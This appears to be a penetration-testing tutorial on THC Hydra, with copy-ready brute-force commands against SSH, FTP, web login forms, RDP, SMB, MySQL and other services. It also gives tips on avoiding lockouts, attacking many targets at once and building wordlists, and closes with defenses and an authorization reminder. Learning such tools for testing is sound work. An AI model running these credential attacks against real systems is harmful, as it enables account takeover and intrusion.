THC Hydra is one of the oldest and most battle-tested online password cracking tools in existence. It supports over 50 protocols and can launch credential attacks against virtually any network authentication service — SSH, FTP, HTTP forms, RDP, SMB, MySQL, VNC, and dozens more. For penetration testers, Hydra is invaluable during the credential-testing phase of an engagement, especially when combined with good wordlists and username enumeration data gathered earlier.
This guide covers installation, core syntax, the most useful protocols, optimizing attacks, and responsible use practices.
Installing Hydra
Hydra ships with Kali Linux and Parrot OS. To install on Debian/Ubuntu:
sudo apt install hydra
To build from source:
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
Verify:
hydra --version
Core Syntax
hydra [options] target protocol
The most important flags:
| Flag | Description |
|---|
-l | Single username |
-L | Username wordlist file |
-p | Single password |
-P | Password wordlist file |
-t | Number of parallel tasks per target (default: 16) |
-s | Custom port number |
-o | Output file for valid credentials |
-v | Verbose mode |
-V | Very verbose (show each attempt) |
-f | Stop after first valid credential found |
-u | Try all usernames before cycling passwords |
Brute-Forcing SSH
SSH is one of the most commonly tested services:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
With a username list:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -o ssh_results.txt
Note: SSH servers often have MaxAuthTries set to 3-6, meaning Hydra needs to space attempts or use fewer threads to avoid being locked out.
Brute-Forcing FTP
hydra -l ftp_user -P passwords.txt ftp://192.168.1.100
For anonymous login testing:
hydra -l anonymous -p anonymous ftp://192.168.1.100
Web login forms are the most common target. Hydra supports both GET and POST form attacks. You need three pieces of information:
- The form action URL
- The POST parameters (use browser DevTools or Burp Suite to capture them)
- A string that appears in a failed login response
HTTP POST Form
hydra -l admin -P rockyou.txt target.com http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
The format for the module is:
"/path:POST_body:failure_string"
^USER^ — replaced with username^PASS^ — replaced with password- The third field is a string that Hydra looks for to identify a failed attempt
hydra -l admin -P passwords.txt target.com http-get-form \
"/login?user=^USER^&pass=^PASS^:Login failed"
With HTTPS
hydra -l admin -P rockyou.txt https-post-form://target.com \
"/login:username=^USER^&password=^PASS^:Incorrect password"
Adding Cookies and Headers
Some applications require a CSRF token or session cookie:
hydra -l admin -P passwords.txt target.com https-post-form \
"/login:username=^USER^&password=^PASS^&_token=abc123:Invalid:H=Cookie: session=xyz"
Use H= to pass custom headers within the module string.
Brute-Forcing RDP
hydra -l administrator -P rockyou.txt rdp://192.168.1.100 -t 4
RDP should use low thread counts (2-4) because the protocol is slow and high concurrency can trigger lockouts.
Brute-Forcing SMB
hydra -l administrator -P rockyou.txt smb://192.168.1.100
Brute-Forcing MySQL
hydra -l root -P passwords.txt mysql://192.168.1.100
Multiple Targets
Hydra can attack a list of targets simultaneously:
hydra -l admin -P rockyou.txt -M targets.txt ssh
Where targets.txt contains one IP or hostname per line.
Optimizing Hydra Attacks
Thread Count
The default of 16 threads is fine for most HTTP services. Reduce to 4 for SSH and RDP to avoid lockouts:
hydra -t 4 -l admin -P rockyou.txt ssh://target
Stop at First Valid Credential
hydra -f -l admin -P rockyou.txt ftp://target
Resume an Interrupted Attack
If Hydra is interrupted, it saves a restore file. Resume with:
hydra -R
Choosing the Right Wordlist
| Scenario | Recommended Wordlist |
|---|
| General purpose | /usr/share/wordlists/rockyou.txt |
| Default credentials | /usr/share/seclists/Passwords/Default-Credentials/ |
| Web applications | /usr/share/seclists/Passwords/Web-Content/ |
| Fast targeting | /usr/share/seclists/Passwords/Common-Credentials/top-1000.txt |
Generate a targeted wordlist with CeWL by spidering the target’s website:
cewl http://target.com -d 2 -m 5 -w custom_wordlist.txt
Common Protocols Reference
| Protocol | Hydra Module | Example |
|---|
| SSH | ssh | hydra -l user -P pass.txt ssh://host |
| FTP | ftp | hydra -l user -P pass.txt ftp://host |
| HTTP POST | http-post-form | See above |
| HTTPS POST | https-post-form | See above |
| RDP | rdp | hydra -l user -P pass.txt rdp://host |
| SMB | smb | hydra -l user -P pass.txt smb://host |
| MySQL | mysql | hydra -l root -P pass.txt mysql://host |
| PostgreSQL | postgres | hydra -l postgres -P pass.txt postgres://host |
| VNC | vnc | hydra -P pass.txt vnc://host |
| Telnet | telnet | hydra -l user -P pass.txt telnet://host |
| SMTP | smtp | hydra -l user -P pass.txt smtp://host |
Defenses Against Hydra Attacks
Understanding Hydra also means understanding how to defend against it:
- Account lockout policies — lock accounts after 5-10 failed attempts
- Rate limiting and CAPTCHA on web login forms
- Fail2ban to ban IPs after repeated SSH failures
- Multi-factor authentication renders credential brute-forcing useless even with valid passwords
- Strong password policies — enforce minimum length and complexity
- SSH key authentication instead of passwords
Legal and Ethical Use
Hydra must only be used against systems you own or have explicit written permission to test. Unauthorized brute-force attacks are criminal offenses under laws like the Computer Fraud and Abuse Act (CFAA) in the US and equivalent legislation globally. Always operate within a defined penetration testing scope and never target production systems without proper authorization.
Summary
THC Hydra remains one of the most effective tools for testing online authentication services. Its protocol breadth, parallel threading, and flexible output options make it a staple in any penetration tester’s toolkit. Pair it with curated wordlists, careful thread management, and proper scope agreements for best results.